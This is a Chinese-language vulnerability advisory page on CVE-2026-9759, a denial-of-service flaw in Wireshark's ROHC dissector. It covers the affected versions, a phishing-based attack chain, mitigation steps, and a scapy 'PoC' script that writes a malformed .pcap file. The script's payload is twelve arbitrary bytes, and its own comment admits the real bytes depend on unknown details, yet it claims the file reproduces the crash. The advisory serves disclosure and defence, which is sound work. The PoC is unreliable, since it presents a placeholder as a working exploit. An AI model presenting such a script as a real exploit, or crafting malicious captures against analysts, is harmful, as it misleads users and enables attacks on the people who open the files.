IPBUF安全漏洞报告
English
CVE-2026-9759 CVSS 5.5 中危

CVE-2026-9759 Wireshark ROHC协议解析器拒绝服务漏洞

披露日期: 2026-05-27

漏洞信息

漏洞编号
CVE-2026-9759
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Wireshark

相关标签

拒绝服务WiresharkDoS协议解析

漏洞概述

Wireshark是一款全球广泛使用的网络协议分析工具。CVE-2026-9759是该工具ROHC协议解析器中发现的安全漏洞。该漏洞影响了Wireshark 4.4.0至4.4.15版本以及4.6.0至4.6.5版本。攻击者可诱导受害者打开包含恶意数据包的捕获文件,触发解析器崩溃,从而导致应用程序拒绝服务,严重影响网络分析工作的连续性。

技术细节

该漏洞源于Wireshark中ROHC(Robust Header Compression,健壮性报头压缩)协议解析器在处理特定畸形数据包时的逻辑缺陷。由于代码未对数据包的特定字段或长度进行充分的边界检查,当解析器尝试解析构造异常的ROHC数据流时,可能发生空指针解引用或越界内存访问。利用此漏洞需要本地攻击向量(AV:L)且需要用户交互(UI:R)。典型的攻击场景是攻击者通过钓鱼邮件等方式发送特制的.pcap文件。当用户使用受影响的Wireshark版本打开该文件时,解析器处理到恶意数据包即会崩溃,导致程序终止或挂起。虽然CVSS向量显示无需认证(PR:N),但必须依赖用户主动打开文件,因此利用门槛相对较高。

攻击链分析

STEP 1
侦察
攻击者识别出目标环境正在使用受影响版本的Wireshark进行网络分析。
STEP 2
武器化
攻击者编写脚本或工具,生成包含针对ROHC协议解析器畸形数据包的特制.pcap文件。
STEP 3
投递
攻击者通过电子邮件、即时通讯工具或其他文件传输渠道,将伪装成正常流量数据的恶意.pcap文件发送给目标用户。
STEP 4
利用
诱导目标用户使用存在漏洞的Wireshark版本打开该文件。当软件解析ROHC数据包时触发崩溃。
STEP 5
影响
Wireshark应用程序异常终止,造成服务拒绝,中断网络故障排查或监控工作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-9759 (Wireshark ROHC Dissector Crash) # This script generates a malformed pcap file that may trigger the crash. # Usage: python3 poc.py from scapy.all import * # Construct a malformed ROHC packet over UDP # ROHC typically runs over IP/UDP, here we simulate a crafted payload # that targets the parsing logic of the dissector. # IP header ip = IP(src="192.168.1.1", dst="192.168.1.2") # UDP header (commonly used transport for ROHC profiles) udp = UDP(sport=12345, dport=12345) # Malformed payload designed to trigger the dissector panic # The specific bytes depend on the vulnerability details, # representing an invalid ROHC profile or segment. malformed_payload = b'\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00' # Assemble the packet pkt = ip/udp/malformed_payload # Save to pcap file wrpcap('cve_2026_9759_crash.pcap', pkt) print("[+] Malformed pcap file generated: cve_2026_9759_crash.pcap") print("[+] Open this file in Wireshark 4.4.x - 4.6.5 to reproduce the crash.")

影响范围

Wireshark 4.6.0 to 4.6.5
Wireshark 4.4.0 to 4.4.15

防御指南

临时缓解措施
建议用户不要打开不受信任的网络捕获文件。如果必须分析可疑流量,应在隔离的沙箱环境中进行。此外,可以在Wireshark的设置中暂时禁用ROHC协议解析器(通过 Edit -> Preferences -> Protocols -> ROHC),以防止漏洞被触发,直到完成版本升级。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表